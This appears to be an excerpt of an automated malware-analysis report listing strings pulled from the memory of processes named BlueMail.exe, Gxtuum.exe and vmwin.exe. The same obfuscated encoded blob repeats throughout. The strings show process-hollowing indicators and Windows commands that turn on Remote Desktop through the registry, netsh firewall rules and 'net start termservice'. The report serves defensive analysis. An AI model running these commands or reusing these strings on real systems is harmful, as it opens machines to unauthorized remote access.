IRv9YSnbnquI4KZbO0WMHR+MHV+I2GqeOil3oNpHzxpFx==cB==Go0sbPV5MR== 3mjcyBvDj6e4Ir=830wce0oDAJoRIsoO30YUeKW2Y0fM5gvaKKjOO9pgp==RIOt0VOd3VSb6IA9NW4zVTVcL3 g6J9d qJ=NY4ndeJ=P3Kxdy0u43uZAGsdVk==OWSDWs==RHKs0yJcL3Wd6ZElaL =OHdheyduzGefQi==NW4FJA3uWydWPXyNRYIX qaQaI==NnqY0y0iQX6eRZD=QndweydqR3dubydvN3drcUWrS3qsSy0iQX6eRZD=JEJwNrVXEkdYGS== nN=a3N=N3dsey0q5D2O7ZwhLmqj OB3fQskhdQzWndwcK6gPYSbGAwe97KkVyJBjMRwQI0xIT5rMK5pARuBcU WQX6UDWMl 7ql9Up3fP0xT9Bq94OrMOWd5HF1AI0d90JZEeVkizvlToBq8XCjceKpQU1cFh5IRUdq5HWo6EWQb1qbKaFkhAsvfMNlaHqtcadrP4Sf6EWvaLybUO4QH RNARtrMK5pCT1=IT5LD9==M4Shdb5tInuu0o==N3dsey0q5D2O7ZwhLmq89zFvfPEkiwlz9jd2MPiZ5z2g45EpI1Ko8yZx3V0n4MQ=R2qRWw0JOFOV5pEh9rGt8U93hf0vZSV4UFStcfWu33y7I44p LKQVPNR3PSo2uNz9YGZey0uKnGnRS==N3drdz0WQYKIQYWhVXOh0y0iQ3ij3ooo90Ul9zJBhWI4idd8bYtuNLNvEEVWFBb1IZX=IY0sbOSrQHVnR2qRWw0JOFOV5pEh9rGt8U93hf0vZSV4UFStcfWu33y7NY0laKKaRepn4P0fVQ9SSGONUxCSJVSzL3r=R2qRWw0JOFOp4pMu96mJVPUzRwwfZSVCanqh0PS9HnGt3YIA81Cm8yJ82yQs4wVzSnqi0OdFIB==UEFuNvF=OH0kZP0o5GOf6JMl9q3pHdlV4QEygxV48XdsOH0kZP0o5GOf6JMl9q3pHdpV4QEygxV48XdsR1dEWxixLlW7LYgf qYp8U332y5sgcRza4ReUdW9H4Ws5oQqaJOb9fRsgVV=RIOt0z0f5F6b4YP=JkFvPI==JkFwN9==JkFvO9==JkFwOI==N40wde0q5FKV3YsgUB==Lkt4 o0s0yCoDAJoRZchI3xeFoWfdUyn2XymAE4iFGYf8KElFjFkKaGW2X2f45QWFHt7Fa2j4zMvNq==Gj3eSPml5DJ=FjFkKaGuQX5aFD3kJs==RHd10POv2HWm4E0hbKJ=IX020OSX5Hmp4pwr9Ka aKFB4PSyiwVD8Xis0OVcCV0j4IPcFk==Fh== 3mZeyWr535aDZHcI1F7Is== 4V7do== nKs0ydpP303Zedd4nRaLIA197KQTxFB4Poy3MQ=JEFuNvFWDUl=JEFuNvFWDkJ=JEFuNvFWDkN=JEFuNvFWD3Z=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: BlueMail.exe, 0000000E.00000002.2324029799.00000000044B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: BlueMail.exe, 0000000E.00000002.2324029799.00000000044B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set8bf9b3f72bb53c678e0173edf42df1aebf11e9eb444cca0553e5dc41fdf05974b44aebd5cb0b54b8fd606f4b5b11d0537fd962 3KsZed03HGoRE0s qX=IASt0e9v2nZtRVEo8qhl7O9n4Q8xhwhAKT9uOs==Rz5jczZpGT6qeI==IT0qeI==KAhwOOShEkhYRi==O4mYeP0pCnWYRS==R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fZgMxYS5nWR==R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fWQ9zgw9CWYOaWPSh4jCN3IQo9Gqw8UBn4QACR4WfdfWX4B==Rn0rV36iJudzzGKHJGgOFGYpHVIjR1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fZgMx o0s0yCoDAJaRIOt0VOd3YN=R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fWQ9zgw9CWYOaVUmh3HxaJo4oWKKo9o==GW0RSNOMLl AKWsBGU==UFKuds==RFdRWs==O10S8XV4aoR4 3V494R4Vnp4VYN4 HR4aX94WH54VY349I3493h4 k5=V4Oj0u g3Hy2Q4sl GUa8yBaV4Oj0u g3Hx=V3Cndu g3Hx=WEJ=WUJ=WUN=WUR=QXKnc9==8IWYdvtrCx==8IWYdzR2Cz9=WYmjWHCqV36i IRv9YSnbnquI4KZbO0WMHR+MHV+I2GqeOil3oNpHzxpFx==cB==Go0sbPV5MR== 3mjcyBvDj6e4Ir=830wce0oDAJoRIsoO30YUeKW2Y0fM5gvaKKjOO9pgp==RIOt0VOd3VSb6IA9NW4zVTVcL3 g6J9d qJ=NY4ndeJ=P3Kxdy0u43uZAGsdVk==OWSDWs==RHKs0yJcL3Wd6ZElaL =OHdheyduzGefQi==NW4FJA3uWydWPXyNRYIX qaQaI==NnqY0y0iQX6eRZD=QndweydqR3dubydvN3drcUWrS3qsSy0iQX6eRZD=JEJwNrVXEkdYGS== nN=a3N=N3dsey0q5D2O7ZwhLmqj OB3fQskhdQzWndwcK6gPYSbGAwe97KkVyJBjMRwQI0xIT5rMK5pARuBcU WQX6UDWMl 7ql9Up3fP0xT9Bq94OrMOWd5HF1AI0d90JZEeVkizvlToBq8XCjceKpQU1cFh5IRUdq5HWo6EWQb1qbKaFkhAsvfMNlaHqtcadrP4Sf6EWvaLybUO4QH RNARtrMK5pCT1=IT5LD9==M4Shdb5tInuu0o==N3dsey0q5D2O7ZwhLmq89zFvfPEkiwlz9jd2MPiZ5z2g45EpI1Ko8yZx3V0n4MQ=R2qRWw0JOFOV5pEh9rGt8U93hf0vZSV4UFStcfWu33y7I44p LKQVPNR3PSo2uNz9YGZey0uKnGnRS==N3drdz0WQYKIQYWhVXOh0y0iQ3ij3ooo90Ul9zJBhWI4idd8bYtuNLNvEEVWFBb1IZX=IY0sbOSrQHVnR2qRWw0JOFOV5pEh9rGt8U93hf0vZSV4UFStcfWu33y7NY0laKKaRepn4P0fVQ9SSGONUxCSJVSzL3r=R2qRWw0JOFOp4pMu96mJVPUzRwwfZSVCanqh0PS9HnGt3YIA81Cm8yJ82yQs4wVzSnqi0OdFIB==UEFuNvF=OH0kZP0o5GOf6JMl9q3pHdlV4QEygxV48XdsOH0kZP0o5GOf6JMl9q3pHdpV4QEygxV48XdsR1dEWxixLlW7LYgf qYp8U332y5sgcRza4ReUdW9H4Ws5oQqaJOb9fRsgVV=RIOt0z0f5F6b4YP=JkFvPI==JkFwN9==JkFvO9==JkFwOI==N40wde0q5FKV3YsgUB==Lkt4 o0s0yCoDAJoRZchI3xeFoWfdUyn2XymAE4iFGYf8KElFjFkKaGW2X2f45QWFHt7Fa2j4zMvNq==Gj3eSPml5DJ=FjFkKaGuQX5aFD3kJs==RHd10POv2HWm4E0hbKJ=IX020OSX5Hmp4pwr9Ka aKFB4PSyiwVD8Xis0OVcCV0j4IPcFk==Fh== 3mZeyWr535aDZHcI1F7Is== 4V7do== nKs0ydpP303Zedd4nRaLIA197KQTxFB4Poy3MQ=JEFuNvFWDUl=JEFuNvFWDkJ=JEFuNvFWDkN=JEFuNvFWD3Z=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: BlueMail.exe, 00000015.00000002.2291037928.00000000005F1000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: BlueMail.exe, 00000015.00000002.2291037928.00000000005F1000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set8bf9b3f72bb53c678e0173edf42df1aebf11e9eb444cca0553e5dc41fdf05974b44aebd5cb0b54b8fd606f4b5b11d0537fd962 3KsZed03HGoRE0s qX=IASt0e9v2nZtRVEo8qhl7O9n4Q8xhwhAKT9uOs==Rz5jczZpGT6qeI==IT0qeI==KAhwOOShEkhYRi==O4mYeP0pCnWYRS==R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fZgMxYS5nWR==R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fWQ9zgw9CWYOaWPSh4jCN3IQo9Gqw8UBn4QACR4WfdfWX4B==Rn0rV36iJudzzGKHJGgOFGYpHVIjR1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fZgMx o0s0yCoDAJaRIOt0VOd3YN=R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fWQ9zgw9CWYOaVUmh3HxaJo4oWKKo9o==GW0RSNOMLl AKWsBGU==UFKuds==RFdRWs==O10S8XV4aoR4 3V494R4Vnp4VYN4 HR4aX94WH54VY349I3493h4 k5=V4Oj0u g3Hy2Q4sl GUa8yBaV4Oj0u g3Hx=V3Cndu g3Hx=WEJ=WUJ=WUN=WUR=QXKnc9==8IWYdvtrCx==8IWYdzR2Cz9=WYmjWHCqV36i IRv9YSnbnquI4KZbO0WMHR+MHV+I2GqeOil3oNpHzxpFx==cB==Go0sbPV5MR== 3mjcyBvDj6e4Ir=830wce0oDAJoRIsoO30YUeKW2Y0fM5gvaKKjOO9pgp==RIOt0VOd3VSb6IA9NW4zVTVcL3 g6J9d qJ=NY4ndeJ=P3Kxdy0u43uZAGsdVk==OWSDWs==RHKs0yJcL3Wd6ZElaL =OHdheyduzGefQi==NW4FJA3uWydWPXyNRYIX qaQaI==NnqY0y0iQX6eRZD=QndweydqR3dubydvN3drcUWrS3qsSy0iQX6eRZD=JEJwNrVXEkdYGS== nN=a3N=N3dsey0q5D2O7ZwhLmqj OB3fQskhdQzWndwcK6gPYSbGAwe97KkVyJBjMRwQI0xIT5rMK5pARuBcU WQX6UDWMl 7ql9Up3fP0xT9Bq94OrMOWd5HF1AI0d90JZEeVkizvlToBq8XCjceKpQU1cFh5IRUdq5HWo6EWQb1qbKaFkhAsvfMNlaHqtcadrP4Sf6EWvaLybUO4QH RNARtrMK5pCT1=IT5LD9==M4Shdb5tInuu0o==N3dsey0q5D2O7ZwhLmq89zFvfPEkiwlz9jd2MPiZ5z2g45EpI1Ko8yZx3V0n4MQ=R2qRWw0JOFOV5pEh9rGt8U93hf0vZSV4UFStcfWu33y7I44p LKQVPNR3PSo2uNz9YGZey0uKnGnRS==N3drdz0WQYKIQYWhVXOh0y0iQ3ij3ooo90Ul9zJBhWI4idd8bYtuNLNvEEVWFBb1IZX=IY0sbOSrQHVnR2qRWw0JOFOV5pEh9rGt8U93hf0vZSV4UFStcfWu33y7NY0laKKaRepn4P0fVQ9SSGONUxCSJVSzL3r=R2qRWw0JOFOp4pMu96mJVPUzRwwfZSVCanqh0PS9HnGt3YIA81Cm8yJ82yQs4wVzSnqi0OdFIB==UEFuNvF=OH0kZP0o5GOf6JMl9q3pHdlV4QEygxV48XdsOH0kZP0o5GOf6JMl9q3pHdpV4QEygxV48XdsR1dEWxixLlW7LYgf qYp8U332y5sgcRza4ReUdW9H4Ws5oQqaJOb9fRsgVV=RIOt0z0f5F6b4YP=JkFvPI==JkFwN9==JkFvO9==JkFwOI==N40wde0q5FKV3YsgUB==Lkt4 o0s0yCoDAJoRZchI3xeFoWfdUyn2XymAE4iFGYf8KElFjFkKaGW2X2f45QWFHt7Fa2j4zMvNq==Gj3eSPml5DJ=FjFkKaGuQX5aFD3kJs==RHd10POv2HWm4E0hbKJ=IX020OSX5Hmp4pwr9Ka aKFB4PSyiwVD8Xis0OVcCV0j4IPcFk==Fh== 3mZeyWr535aDZHcI1F7Is== 4V7do== nKs0ydpP303Zedd4nRaLIA197KQTxFB4Poy3MQ=JEFuNvFWDUl=JEFuNvFWDkJ=JEFuNvFWDkN=JEFuNvFWD3Z=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 00000016.00000002.2582870539.000000000295F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000016.00000002.2582870539.000000000295F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set8bf9b3f72bb53c678e0173edf42df1aebf11e9eb444cca0553e5dc41fdf05974b44aebd5cb0b54b8fd606f4b5b11d0537fd962 3KsZed03HGoRE0s qX=IASt0e9v2nZtRVEo8qhl7O9n4Q8xhwhAKT9uOs==Rz5jczZpGT6qeI==IT0qeI==KAhwOOShEkhYRi==O4mYeP0pCnWYRS==R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fZgMxYS5nWR==R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fWQ9zgw9CWYOaWPSh4jCN3IQo9Gqw8UBn4QACR4WfdfWX4B==Rn0rV36iJudzzGKHJGgOFGYpHVIjR1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fZgMx o0s0yCoDAJaRIOt0VOd3YN=R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fWQ9zgw9CWYOaVUmh3HxaJo4oWKKo9o==GW0RSNOMLl AKWsBGU==UFKuds==RFdRWs==O10S8XV4aoR4 3V494R4Vnp4VYN4 HR4aX94WH54VY349I3493h4 k5=V4Oj0u g3Hy2Q4sl GUa8yBaV4Oj0u g3Hx=V3Cndu g3Hx=WEJ=WUJ=WUN=WUR=QXKnc9==8IWYdvtrCx==8IWYdzR2Cz9=WYmjWHCqV36i IRv9YSnbnquI4KZbO0WMHR+MHV+I2GqeOil3oNpHzxpFx==cB==Go0sbPV5MR== 3mjcyBvDj6e4Ir=830wce0oDAJoRIsoO30YUeKW2Y0fM5gvaKKjOO9pgp==RIOt0VOd3VSb6IA9NW4zVTVcL3 g6J9d qJ=NY4ndeJ=P3Kxdy0u43uZAGsdVk==OWSDWs==RHKs0yJcL3Wd6ZElaL =OHdheyduzGefQi==NW4FJA3uWydWPXyNRYIX qaQaI==NnqY0y0iQX6eRZD=QndweydqR3dubydvN3drcUWrS3qsSy0iQX6eRZD=JEJwNrVXEkdYGS== nN=a3N=N3dsey0q5D2O7ZwhLmqj OB3fQskhdQzWndwcK6gPYSbGAwe97KkVyJBjMRwQI0xIT5rMK5pARuBcU WQX6UDWMl 7ql9Up3fP0xT9Bq94OrMOWd5HF1AI0d90JZEeVkizvlToBq8XCjceKpQU1cFh5IRUdq5HWo6EWQb1qbKaFkhAsvfMNlaHqtcadrP4Sf6EWvaLybUO4QH RNARtrMK5pCT1=IT5LD9==M4Shdb5tInuu0o==N3dsey0q5D2O7ZwhLmq89zFvfPEkiwlz9jd2MPiZ5z2g45EpI1Ko8yZx3V0n4MQ=R2qRWw0JOFOV5pEh9rGt8U93hf0vZSV4UFStcfWu33y7I44p LKQVPNR3PSo2uNz9YGZey0uKnGnRS==N3drdz0WQYKIQYWhVXOh0y0iQ3ij3ooo90Ul9zJBhWI4idd8bYtuNLNvEEVWFBb1IZX=IY0sbOSrQHVnR2qRWw0JOFOV5pEh9rGt8U93hf0vZSV4UFStcfWu33y7NY0laKKaRepn4P0fVQ9SSGONUxCSJVSzL3r=R2qRWw0JOFOp4pMu96mJVPUzRwwfZSVCanqh0PS9HnGt3YIA81Cm8yJ82yQs4wVzSnqi0OdFIB==UEFuNvF=OH0kZP0o5GOf6JMl9q3pHdlV4QEygxV48XdsOH0kZP0o5GOf6JMl9q3pHdpV4QEygxV48XdsR1dEWxixLlW7LYgf qYp8U332y5sgcRza4ReUdW9H4Ws5oQqaJOb9fRsgVV=RIOt0z0f5F6b4YP=JkFvPI==JkFwN9==JkFvO9==JkFwOI==N40wde0q5FKV3YsgUB==Lkt4 o0s0yCoDAJoRZchI3xeFoWfdUyn2XymAE4iFGYf8KElFjFkKaGW2X2f45QWFHt7Fa2j4zMvNq==Gj3eSPml5DJ=FjFkKaGuQX5aFD3kJs==RHd10POv2HWm4E0hbKJ=IX020OSX5Hmp4pwr9Ka aKFB4PSyiwVD8Xis0OVcCV0j4IPcFk==Fh== 3mZeyWr535aDZHcI1F7Is== 4V7do== nKs0ydpP303Zedd4nRaLIA197KQTxFB4Poy3MQ=JEFuNvFWDUl=JEFuNvFWDkJ=JEFuNvFWDkN=JEFuNvFWD3Z=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 00000016.00000002.2789644908.0000000003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000016.00000002.2789644908.0000000003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set8bf9b3f72bb53c678e0173edf42df1aebf11e9eb444cca0553e5dc41fdf05974b44aebd5cb0b54b8fd606f4b5b11d0537fd962 3KsZed03HGoRE0s qX=IASt0e9v2nZtRVEo8qhl7O9n4Q8xhwhAKT9uOs==Rz5jczZpGT6qeI==IT0qeI==KAhwOOShEkhYRi==O4mYeP0pCnWYRS==R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fZgMxYS5nWR==R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fWQ9zgw9CWYOaWPSh4jCN3IQo9Gqw8UBn4QACR4WfdfWX4B==Rn0rV36iJudzzGKHJGgOFGYpHVIjR1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fZgMx o0s0yCoDAJaRIOt0VOd3YN=R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fWQ9zgw9CWYOaVUmh3HxaJo4oWKKo9o==GW0RSNOMLl AKWsBGU==UFKuds==RFdRWs==O10S8XV4aoR4 3V494R4Vnp4VYN4 HR4aX94WH54VY349I3493h4 k5=V4Oj0u g3Hy2Q4sl GUa8yBaV4Oj0u g3Hx=V3Cndu g3Hx=WEJ=WUJ=WUN=WUR=QXKnc9==8IWYdvtrCx==8IWYdzR2Cz9=WYmjWHCqV36i IRv9YSnbnquI4KZbO0WMHR+MHV+I2GqeOil3oNpHzxpFx==cB==Go0sbPV5MR== 3mjcyBvDj6e4Ir=830wce0oDAJoRIsoO30YUeKW2Y0fM5gvaKKjOO9pgp==RIOt0VOd3VSb6IA9NW4zVTVcL3 g6J9d qJ=NY4ndeJ=P3Kxdy0u43uZAGsdVk==OWSDWs==RHKs0yJcL3Wd6ZElaL =OHdheyduzGefQi==NW4FJA3uWydWPXyNRYIX qaQaI==NnqY0y0iQX6eRZD=QndweydqR3dubydvN3drcUWrS3qsSy0iQX6eRZD=JEJwNrVXEkdYGS== nN=a3N=N3dsey0q5D2O7ZwhLmqj OB3fQskhdQzWndwcK6gPYSbGAwe97KkVyJBjMRwQI0xIT5rMK5pARuBcU WQX6UDWMl 7ql9Up3fP0xT9Bq94OrMOWd5HF1AI0d90JZEeVkizvlToBq8XCjceKpQU1cFh5IRUdq5HWo6EWQb1qbKaFkhAsvfMNlaHqtcadrP4Sf6EWvaLybUO4QH RNARtrMK5pCT1=IT5LD9==M4Shdb5tInuu0o==N3dsey0q5D2O7ZwhLmq89zFvfPEkiwlz9jd2MPiZ5z2g45EpI1Ko8yZx3V0n4MQ=R2qRWw0JOFOV5pEh9rGt8U93hf0vZSV4UFStcfWu33y7I44p LKQVPNR3PSo2uNz9YGZey0uKnGnRS==N3drdz0WQYKIQYWhVXOh0y0iQ3ij3ooo90Ul9zJBhWI4idd8bYtuNLNvEEVWFBb1IZX=IY0sbOSrQHVnR2qRWw0JOFOV5pEh9rGt8U93hf0vZSV4UFStcfWu33y7NY0laKKaRepn4P0fVQ9SSGONUxCSJVSzL3r=R2qRWw0JOFOp4pMu96mJVPUzRwwfZSVCanqh0PS9HnGt3YIA81Cm8yJ82yQs4wVzSnqi0OdFIB==UEFuNvF=OH0kZP0o5GOf6JMl9q3pHdlV4QEygxV48XdsOH0kZP0o5GOf6JMl9q3pHdpV4QEygxV48XdsR1dEWxixLlW7LYgf qYp8U332y5sgcRza4ReUdW9H4Ws5oQqaJOb9fRsgVV=RIOt0z0f5F6b4YP=JkFvPI==JkFwN9==JkFvO9==JkFwOI==N40wde0q5FKV3YsgUB==Lkt4 o0s0yCoDAJoRZchI3xeFoWfdUyn2XymAE4iFGYf8KElFjFkKaGW2X2f45QWFHt7Fa2j4zMvNq==Gj3eSPml5DJ=FjFkKaGuQX5aFD3kJs==RHd10POv2HWm4E0hbKJ=IX020OSX5Hmp4pwr9Ka aKFB4PSyiwVD8Xis0OVcCV0j4IPcFk==Fh== 3mZeyWr535aDZHcI1F7Is== 4V7do== nKs0ydpP303Zedd4nRaLIA197KQTxFB4Poy3MQ=JEFuNvFWDUl=JEFuNvFWDkJ=JEFuNvFWDkN=JEFuNvFWD3Z=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 00000017.00000002.2587726358.000000000313C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000017.00000002.2587726358.000000000313C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set8bf9b3f72bb53c678e0173edf42df1aebf11e9eb444cca0553e5dc41fdf05974b44aebd5cb0b54b8fd606f4b5b11d0537fd962 3KsZed03HGoRE0s qX=IASt0e9v2nZtRVEo8qhl7O9n4Q8xhwhAKT9uOs==Rz5jczZpGT6qeI==IT0qeI==KAhwOOShEkhYRi==O4mYeP0pCnWYRS==R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fZgMxYS5nWR==R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fWQ9zgw9CWYOaWPSh4jCN3IQo9Gqw8UBn4QACR4WfdfWX4B==Rn0rV36iJudzzGKHJGgOFGYpHVIjR1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fZgMx o0s0yCoDAJaRIOt0VOd3YN=R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fWQ9zgw9CWYOaVUmh3HxaJo4oWKKo9o==GW0RSNOMLl AKWsBGU==UFKuds==RFdRWs==O10S8XV4aoR4 3V494R4Vnp4VYN4 HR4aX94WH54VY349I3493h4 k5=V4Oj0u g3Hy2Q4sl GUa8yBaV4Oj0u g3Hx=V3Cndu g3Hx=WEJ=WUJ=WUN=WUR=QXKnc9==8IWYdvtrCx==8IWYdzR2Cz9=WYmjWHCqV36i IRv9YSnbnquI4KZbO0WMHR+MHV+I2GqeOil3oNpHzxpFx==cB==Go0sbPV5MR== 3mjcyBvDj6e4Ir=830wce0oDAJoRIsoO30YUeKW2Y0fM5gvaKKjOO9pgp==RIOt0VOd3VSb6IA9NW4zVTVcL3 g6J9d qJ=NY4ndeJ=P3Kxdy0u43uZAGsdVk==OWSDWs==RHKs0yJcL3Wd6ZElaL =OHdheyduzGefQi==NW4FJA3uWydWPXyNRYIX qaQaI==NnqY0y0iQX6eRZD=QndweydqR3dubydvN3drcUWrS3qsSy0iQX6eRZD=JEJwNrVXEkdYGS== nN=a3N=N3dsey0q5D2O7ZwhLmqj OB3fQskhdQzWndwcK6gPYSbGAwe97KkVyJBjMRwQI0xIT5rMK5pARuBcU WQX6UDWMl 7ql9Up3fP0xT9Bq94OrMOWd5HF1AI0d90JZEeVkizvlToBq8XCjceKpQU1cFh5IRUdq5HWo6EWQb1qbKaFkhAsvfMNlaHqtcadrP4Sf6EWvaLybUO4QH RNARtrMK5pCT1=IT5LD9==M4Shdb5tInuu0o==N3dsey0q5D2O7ZwhLmq89zFvfPEkiwlz9jd2MPiZ5z2g45EpI1Ko8yZx3V0n4MQ=R2qRWw0JOFOV5pEh9rGt8U93hf0vZSV4UFStcfWu33y7I44p LKQVPNR3PSo2uNz9YGZey0uKnGnRS==N3drdz0WQYKIQYWhVXOh0y0iQ3ij3ooo90Ul9zJBhWI4idd8bYtuNLNvEEVWFBb1IZX=IY0sbOSrQHVnR2qRWw0JOFOV5pEh9rGt8U93hf0vZSV4UFStcfWu33y7NY0laKKaRepn4P0fVQ9SSGONUxCSJVSzL3r=R2qRWw0JOFOp4pMu96mJVPUzRwwfZSVCanqh0PS9HnGt3YIA81Cm8yJ82yQs4wVzSnqi0OdFIB==UEFuNvF=OH0kZP0o5GOf6JMl9q3pHdlV4QEygxV48XdsOH0kZP0o5GOf6JMl9q3pHdpV4QEygxV48XdsR1dEWxixLlW7LYgf qYp8U332y5sgcRza4ReUdW9H4Ws5oQqaJOb9fRsgVV=RIOt0z0f5F6b4YP=JkFvPI==JkFwN9==JkFvO9==JkFwOI==N40wde0q5FKV3YsgUB==Lkt4 o0s0yCoDAJoRZchI3xeFoWfdUyn2XymAE4iFGYf8KElFjFkKaGW2X2f45QWFHt7Fa2j4zMvNq==Gj3eSPml5DJ=FjFkKaGuQX5aFD3kJs==RHd10POv2HWm4E0hbKJ=IX020OSX5Hmp4pwr9Ka aKFB4PSyiwVD8Xis0OVcCV0j4IPcFk==Fh== 3mZeyWr535aDZHcI1F7Is== 4V7do== nKs0ydpP303Zedd4nRaLIA197KQTxFB4Poy3MQ=JEFuNvFWDUl=JEFuNvFWDkJ=JEFuNvFWDkN=JEFuNvFWD3Z=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: vmwin.exe, 0000001D.00000002.2710996354.0000000003445000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: vmwin.exe, 0000001D.00000002.2710996354.0000000003445000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set8bf9b3f72bb53c678e0173edf42df1aebf11e9eb444cca0553e5dc41fdf05974b44aebd5cb0b54b8fd606f4b5b11d0537fd962 3KsZed03HGoRE0s 